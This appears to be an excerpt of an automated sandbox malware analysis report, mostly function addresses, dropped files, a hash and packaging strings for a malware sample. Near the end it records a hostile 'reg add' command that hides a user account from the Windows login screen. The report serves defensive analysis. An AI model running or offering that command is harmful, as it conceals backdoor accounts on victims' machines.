7_2_00C91A7B

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	7_2_00C9F0CD
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	10_2_00A6F0CD
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	13_2_0060F0CD

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows\System32\null

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00406128	0_2_00406128
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00405811	0_2_00405811
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004198C3	0_2_004198C3
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004178D6	0_2_004178D6
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040B230	0_2_0040B230
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004142CC	0_2_004142CC
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040BA90	0_2_0040BA90
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040F320	0_2_0040F320
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040AB90	0_2_0040AB90
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040EBB8	0_2_0040EBB8
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040B440	0_2_0040B440
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040A4E0	0_2_0040A4E0
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00419551	0_2_00419551
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00418D50	0_2_00418D50
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040C5F0	0_2_0040C5F0
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0041962B	0_2_0041962B
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040A6A0	0_2_0040A6A0
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004127FC	0_2_004127FC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C580C7	7_2_00C580C7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C52097	7_2_00C52097
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C321FD	7_2_00C321FD
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C52352	7_2_00C52352
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C6A30E	7_2_00C6A30E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C4C45C	7_2_00C4C45C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CBC5C4	7_2_00CBC5C4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA28D7	7_2_00CA28D7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C6E920	7_2_00C6E920
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C98AB4	7_2_00C98AB4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C66B8B	7_2_00C66B8B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C4CBB2	7_2_00C4CBB2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C5CEC0	7_2_00C5CEC0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CC4F4F	7_2_00CC4F4F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C3D000	7_2_00C3D000
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C671F9	7_2_00C671F9
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C39540	7_2_00C39540
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C517B4	7_2_00C517B4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C39A20	7_2_00C39A20
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C51B26	7_2_00C51B26
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C57C3B	7_2_00C57C3B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C51DD0	7_2_00C51DD0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C39E80	7_2_00C39E80
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C57E6A	7_2_00C57E6A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C4DF78	7_2_00C4DF78
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A22097	10_2_00A22097
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A280C7	10_2_00A280C7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A021FD	10_2_00A021FD
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A3A30E	10_2_00A3A30E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A22352	10_2_00A22352
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A1C45C	10_2_00A1C45C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A8C5C4	10_2_00A8C5C4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A728D7	10_2_00A728D7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A3E920	10_2_00A3E920
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A68AB4	10_2_00A68AB4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A1CBB2	10_2_00A1CBB2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A36B8B	10_2_00A36B8B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A2CEC0	10_2_00A2CEC0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A94F4F	10_2_00A94F4F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A0D000	10_2_00A0D000
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A371F9	10_2_00A371F9
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A09540	10_2_00A09540
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A217B4	10_2_00A217B4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A09A20	10_2_00A09A20
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A21B26	10_2_00A21B26
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A27C3B	10_2_00A27C3B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A21DD0	10_2_00A21DD0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A09E80	10_2_00A09E80
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A27E6A	10_2_00A27E6A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A1DF78	10_2_00A1DF78
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C80C7	13_2_005C80C7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C2097	13_2_005C2097
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005A21FD	13_2_005A21FD
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C2352	13_2_005C2352
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005DA30E	13_2_005DA30E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005BC45C	13_2_005BC45C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0062C5C4	13_2_0062C5C4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_006128D7	13_2_006128D7
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005DE920	13_2_005DE920
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00608AB4	13_2_00608AB4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005D6B8B	13_2_005D6B8B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005BCBB2	13_2_005BCBB2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005CCEC0	13_2_005CCEC0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00634F4F	13_2_00634F4F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005AD000	13_2_005AD000
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005D71F9	13_2_005D71F9
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005A9540	13_2_005A9540
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C17B4	13_2_005C17B4
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005A9A20	13_2_005A9A20
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C1B26	13_2_005C1B26
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C7C3B	13_2_005C7C3B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C1DD0	13_2_005C1DD0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C7E6A	13_2_005C7E6A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005A9E80	13_2_005A9E80
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005BDF78	13_2_005BDF78

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: String function: 005BFE52 appears 39 times
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: String function: 005C0E50 appears 46 times
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: String function: 00C50E50 appears 46 times
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: String function: 00405041 appears 41 times
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: String function: 00A20E50 appears 46 times

Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoIt3.exeP vs 8lOT1rXZp5.exe
Source: 8lOT1rXZp5.exe, 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 8lOT1rXZp5.exe

Source: 8lOT1rXZp5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f

